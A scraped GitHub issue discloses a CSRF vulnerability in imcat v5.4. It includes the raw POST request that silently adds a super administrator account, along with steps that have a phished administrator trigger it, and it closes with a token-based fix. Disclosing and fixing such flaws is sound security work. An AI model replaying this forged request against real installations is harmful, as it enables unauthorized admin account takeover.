imcat icon indicating copy to clipboard operation
imcat copied to clipboard

Published 20 hours ago verified publisher icon peacexie

CSRF vulnerability in imcat v5.4

Open haungtongfu opened this issue 3 years ago • 7 comments

1. Overview

Official website: http://txjia.com/imcat/

Version: imcat-5.4

Vulnerability type: CSRF post

Source code: https://github.com/peacexie/imcat/releases/tag/v5.4

Harm: Super administrator account can be added

2. Analysis

2.1 logic analysis

In the add administrator page, the security of data source is not verified by token and referer image (1) There is no token used for security verification in the data packet, so there is the possibility of forgery POST /imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=& HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 539 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=&recbk=ref Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1622443371; CKFinder_Path=Files%3A%2F%3A1; v49_sessid_4294e52897e5=2021-6b-hg49-yttfxda8f-7e5f79d1a; v49_Uniqueid_01348a66d0e6=2021-6h-a25c-5s8pgxq58-0e63b0fe2; Hm_lpvt_948dba1e5d873b9c1f1c77078c521c89=1622444424; twVscAv_admauth=1606cECE916XO1gVfiR9ahqpqkEJMTxa4R5XjBOh69Cfppjn2zcpGMtx5x7BRkm4L0Vposdev%2B2ydGfzzC3me67ttA1foMK2UXNSybiOLOvH; v49_vcodes=fmadm%3Dnull%0Afmcomadd%3D1623809462%2C49f8c2fc48af351f%0Afmapply%3D1623830847%2C7da4f846fdbd0243%0A; v49_ocar_items=0; PHPSESSID=5b4be5ad4c47747257ac13a5c15265c9 Upgrade-Insecure-Requests: 1

recbk=http%3A%2F%2F127.0.0.1%2Fimcat%2Froot%2Frun%2Fadm.php%3Fdops-a%26mod%3Dadminer&fm%5Buid%5D=2021-6p-j6xk&fm%5Buno%5D=1&fm%5Buname%5D=qwe_123&fm%5Bupass%5D=adm_123&fm%5Bgrade%5D=supper&fm%5Bshow%5D=1&fm%5Bmname%5D=qwe_123&fm%5Bindep%5D=inadm&fm%5Bmiuid%5D=&fm%5Bmtel%5D=12345678091&fm%5Bmemail%5D=23wqw%4022.com&fm%5Bmaddr%5D=&fm%5Batime%5D=2021-06-21+17%3A14%3A49&fm%5Betime%5D=2021-06-21+17%3A14%3A49&fm%5Bauser%5D=adm_123&fm%5Beuser%5D=adm_123&fm%5Baip%5D=127.0.0.1&fm%5Beip%5D=127.0.0.1&bsend=%E6%8F%90%E4%BA%A4&mod=adminer&isadd=1

(2) After deleting the referer: information, you can still add an administrator image

3. Loophole recurrence

(1) Environment preparation, building environment with phpstudy image (2) Construct a payload with the function of creating a super administrator account, qwe_ 123/adm_ one hundred and twenty-three

(3) Through a variety of fishing means to lure the administrator to click on the page, that is, to complete the action of adding super administrator without the administrator's knowledge ![image](https://user-images.githubusercontent.com/58809869/123199520-9c4db300-d4e1-11eb-8c46-94d9a911babe.png) ![image](https://user-images.githubusercontent.com/58809869/123199525-9f48a380-d4e1-11eb-8d18-87c3044191a5.png) ![image](https://user-images.githubusercontent.com/58809869/123199531-a2dc2a80-d4e1-11eb-9df6-fb13551bbcfe.png) ### 4. Verification of attack results

Using qwe_ 123/adm_ 123 login in the background image

5. Means of Defense

Add a token to the place where important actions are performed for authentication. The value of the token must be random and unpredictable

haungtongfu avatar Jun 24 '21 03:06 haungtongfu